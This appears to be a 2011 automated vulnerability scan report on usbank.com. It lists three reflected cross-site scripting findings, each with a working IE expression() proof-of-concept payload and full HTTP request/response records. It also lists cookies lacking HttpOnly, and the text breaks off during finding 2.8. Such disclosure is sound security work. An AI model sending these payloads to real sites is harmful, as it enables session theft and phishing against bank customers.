XSS. usbank.com, Cross Site Scripting, CWe-79, CAPEC-86

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Thu Mar 17 15:27:44 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading




Loading

1. Cross-site scripting (reflected)

1.1. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm [easyrefi parameter]

1.2. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm [src parameter]

1.3. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_loans_lines_ps.cfm [src parameter]

2. Cookie without HttpOnly flag set

2.1. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm

2.2. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_loans_lines_ps.cfm

2.3. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_smart_refi.cfm

2.4. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/loan_dtls.cfm

2.5. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/usb_creditline_ps.cfm

2.6. http://www.usbank.com/en/personal/products_and_services/checking/recommender/survey.cfm

2.7. http://www.usbank.com/en/personal/products_and_services/creditcards/browse.cfm

2.8. http://www.usbank.com/search/default.asp

2.9. http://www.usbank.com/usbanklocations/LanguageController

2.10. http://www.usbank.com/usbanklocations/remoteSearch.jsp

2.11. http://www.usbank.com/usbanklocations/search.jsp

2.12. http://www.usbank.com/redirectcentral.cfm

3. Referer-dependent response

4. Cookie scoped to parent domain

4.1. http://www.usbank.com/redirectcentral.cfm

4.2. http://www.usbank.com/search/default.asp

5. Cross-domain Referer leakage

5.1. http://www.usbank.com/cgi_w/cfm/personal/sub_global/online_statements.cfm

5.2. http://www.usbank.com/en/personal/products_and_services/onlinebanking.cfm

5.3. http://www.usbank.com/usbanklocations/LanguageController

6. Email addresses disclosed

6.1. http://www.usbank.com/cgi_w/cfm/about/online_security/online_fraud.cfm

6.2. http://www.usbank.com/en/js/global/s_code.js

6.3. http://www.usbank.com/js/frameworks/jquery/jquery-1.4.2.js

7. HTML does not specify charset



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm [easyrefi parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm

Issue detail

The value of the easyrefi request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8d39"><x%20style%3dx%3aexpression(alert(1))>d9152e1a565 was submitted in the easyrefi parameter. This input was echoed as c8d39"><x style=x:expression(alert(1))>d9152e1a565 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm?GroupCD=A&easyrefi=truec8d39"><x%20style%3dx%3aexpression(alert(1))>d9152e1a565&src=homedropdown HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13480;expires=Fri, 08-Mar-2041 12:00:23 GMT;path=/
Set-Cookie: CFTOKEN=81792004;expires=Fri, 08-Mar-2041 12:00:23 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:00:23 GMT
Connection: close
Content-Length: 20421


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>View Home Equity Rates and Payments from U.S. Bank</title>

<link rel="stylesheet" href="/en/legacy/st
...[SNIP]...
<form action="/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/rate_display.cfm?GroupCD=A&easyrefi=truec8d39"><x style=x:expression(alert(1))>d9152e1a565&src=homedropdown" method="post" name="zipcodeForm">
...[SNIP]...

1.2. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9824e"><x%20style%3dx%3aexpression(alert(1))>318c3a2db3b was submitted in the src parameter. This input was echoed as 9824e"><x style=x:expression(alert(1))>318c3a2db3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm?GroupCD=B&src=homedropdown9824e"><x%20style%3dx%3aexpression(alert(1))>318c3a2db3b HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13474;expires=Fri, 08-Mar-2041 12:00:22 GMT;path=/
Set-Cookie: CFTOKEN=53856353;expires=Fri, 08-Mar-2041 12:00:22 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:00:21 GMT
Connection: close
Content-Length: 18798


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>View Auto Loan Rates and Payments from U.S. Bank</title>

<link rel="stylesheet" href="/en/legacy/styl
...[SNIP]...
<form action="/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/rate_display.cfm?GroupCD=B&EASYREFI=false&src=homedropdown9824e"><x style=x:expression(alert(1))>318c3a2db3b" method="post" name="zipcodeForm">
...[SNIP]...

1.3. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_loans_lines_ps.cfm [src parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_loans_lines_ps.cfm

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e3b"><x%20style%3dx%3aexpression(alert(1))>7610b0b1a33 was submitted in the src parameter. This input was echoed as 65e3b"><x style=x:expression(alert(1))>7610b0b1a33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_loans_lines_ps.cfm?src=BrwngMM65e3b"><x%20style%3dx%3aexpression(alert(1))>7610b0b1a33 HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13456;expires=Fri, 08-Mar-2041 12:00:17 GMT;path=/
Set-Cookie: CFTOKEN=80136216;expires=Fri, 08-Mar-2041 12:00:17 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:00:16 GMT
Connection: close
Content-Length: 32297


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>Home Equity Lines of Credit and Home Equity Loans from U.S. Bank</title>

<link rel="stylesheet" href=
...[SNIP]...
<form action="/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/rate_display.cfm?GroupCD=A&EASYREFI=false&src=BrwngMM65e3b"><x style=x:expression(alert(1))>7610b0b1a33" method="post" name="zipcodeForm">
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next
There are 12 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



2.1. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/credit_rates/zipcode.cfm HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13250;expires=Fri, 08-Mar-2041 11:59:56 GMT;path=/
Set-Cookie: CFTOKEN=13120415;expires=Fri, 08-Mar-2041 11:59:56 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:56 GMT
Connection: close
Content-Length: 20355


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>View Home Equity Rates and Payments from U.S. Bank</title>

<link rel="stylesheet" href="/en/legacy/st
...[SNIP]...

2.2. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_loans_lines_ps.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_loans_lines_ps.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_loans_lines_ps.cfm HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13203;expires=Fri, 08-Mar-2041 11:59:53 GMT;path=/
Set-Cookie: CFTOKEN=63335331;expires=Fri, 08-Mar-2041 11:59:53 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:53 GMT
Connection: close
Content-Length: 32235


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>Home Equity Lines of Credit and Home Equity Loans from U.S. Bank</title>

<link rel="stylesheet" href=
...[SNIP]...

2.3. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_smart_refi.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_smart_refi.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/home_equity_smart_refi.cfm HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13243;expires=Fri, 08-Mar-2041 11:59:56 GMT;path=/
Set-Cookie: CFTOKEN=13678760;expires=Fri, 08-Mar-2041 11:59:56 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:55 GMT
Connection: close
Content-Length: 26516


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>U.S. Bank Smart Mortgage Refinance</title>

<link rel="stylesheet" href="/en/legacy/style/global/globa
...[SNIP]...

2.4. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/loan_dtls.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/loan_dtls.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/loan_dtls.cfm HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13209;expires=Fri, 08-Mar-2041 11:59:54 GMT;path=/
Set-Cookie: CFTOKEN=25565567;expires=Fri, 08-Mar-2041 11:59:54 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:53 GMT
Connection: close
Content-Length: 25351


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>


<title>Auto Loans from U.S. Bank for new and used vehicles</title>

<link rel="stylesheet" href="/en/legacy/s
...[SNIP]...

2.5. http://www.usbank.com/cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/usb_creditline_ps.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/usb_creditline_ps.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi_w/cfm/personal/products_and_services/loans_and_credit_lines/usb_creditline_ps.cfm HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13223;expires=Fri, 08-Mar-2041 11:59:55 GMT;path=/
Set-Cookie: CFTOKEN=21887656;expires=Fri, 08-Mar-2041 11:59:55 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:54 GMT
Connection: close
Content-Length: 20087


<script>
function openLink()
{
window.open('https://loansandlines.usbank.com/loanslines/termsConditionsPrintable.do?methodToCall=displayPrintable&' + 'catProductCode' + '=' + '193', 'TC', 'resi
...[SNIP]...

2.6. http://www.usbank.com/en/personal/products_and_services/checking/recommender/survey.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /en/personal/products_and_services/checking/recommender/survey.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/personal/products_and_services/checking/recommender/survey.cfm HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: iq%5Fid=393865420%2E7055475; JSESSIONID=0000QCre_it0LXdq9s1lApKLQBP:-1; s_pers=%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_lv%3D1300278074758%7C1394886074758%3B%20s_lv_s%3DFirst%2520Visit%7C1300279874758%3B%20s_nr%3D1300278074763-New%7C1473078074763%3B%20s_invisit%3Dtrue%7C1300279874764%3B%20sc_visit_start%3D1%7C1300279874766%3B%20s_visitStart%3Dno%2520value%7C1300279874768%3B%20s_prevPage%3Dusb%253Achecking%253Aindex.html%7C1300279874769%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300267338779:ss=1300267327521; s_sess=%20s_linkTrack%3DPersonal%2520Home%2520Page%255E%255EChecking%255E%255EPersonal%2520Home%2520Page%2520%257C%2520Checking%255E%255E%3B%20s_ria%3Dflash%252010%257Csilverlight%25204.0%3B%20s_ppv%3D73%3B%20s_cc%3Dtrue%3B%20SiteC_LINKS%3Dusb%253Achecking%253Aindex.html%255E%255ELog%2520In%2520to%2520Your%2520Account%255E%255Eusb%253Achecking%253Aindex.html%2520%257C%2520Log%2520In%2520to%2520Your%2520Account%255E%255E%3B%20s_sq%3Dusbankcom%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fwww.usbank.com%2525252Fchecking%2525252Findex.html%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww4.usbank.com%2525252FinternetBanking%2525252FRequestRouter%2525253FrequestCmdId%2525253DDisplayLoginPage_1%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B; ASPSESSIONIDCASCAARB=EJNPIFCAFJEOAJKAMCLADIJM; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; CAMPIDTYPE=0; CookieEnabled=true; CAMPID=r2952; mbox=check#true#1300278129|session#1300278068498-162067#1300279929; USBHOMEPAGEPREF=;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=14631;expires=Fri, 08-Mar-2041 12:55:04 GMT;path=/
Set-Cookie: CFTOKEN=33480260;expires=Fri, 08-Mar-2041 12:55:04 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 12:55:03 GMT
Connection: close
Content-Length: 30855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...

2.7. http://www.usbank.com/en/personal/products_and_services/creditcards/browse.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /en/personal/products_and_services/creditcards/browse.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/personal/products_and_services/creditcards/browse.cfm HTTP/1.1
Host: www.usbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_lv%3D1300275619538%7C1394883619538%3B%20s_lv_s%3DFirst%2520Visit%7C1300277419538%3B%20s_nr%3D1300275619542-New%7C1473075619542%3B%20s_vnum%3D1473075619545%2526vn%253D1%7C1473075619545%3B%20s_invisit%3Dtrue%7C1300277419545%3B%20sc_visit_start%3D1%7C1300277419564%3B%20s_visitStart%3D1%7C1300277419566%3B%20s_prevPage%3DPersonal%2520Home%2520Page%7C1300277419567%3B; WT_FPC=id=268076e74370df281811300264817909:lv=1300264817909:ss=1300264817909; s_sess=%20s_cc%3Dtrue%3B%20s_linkTrack%3D%3B%20s_sq%3D%3B%20s_ppv%3D77%3B; s_vi=[CS]v1|26C050D4051D2B35-40000128C02942DC[CE]; USBHOMEPAGEPREF=;

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=ISO-8859-1
Location: /credit-cards/compare.html
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=13181;expires=Fri, 08-Mar-2041 11:59:46 GMT;path=/
Set-Cookie: CFTOKEN=28402843;expires=Fri, 08-Mar-2041 11:59:46 GMT;path=/
X-Powered-By: ASP.NET
Date: Wed, 16 Mar 2011 11:59:45 GMT
Connection: close
Content-Length: 0


2.8. http://www.usbank.com/search/default.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.usbank.com
Path:   /search/default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /search/default.asp HTTP/1.1
Host: www.usbank.com
Proxy-Connection: keep-alive
Referer: http://www.usbank.com/en/personal/PersonalCustomerService.cfm
Cache-Control: max-age=0
Origin: http://www.usbank.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
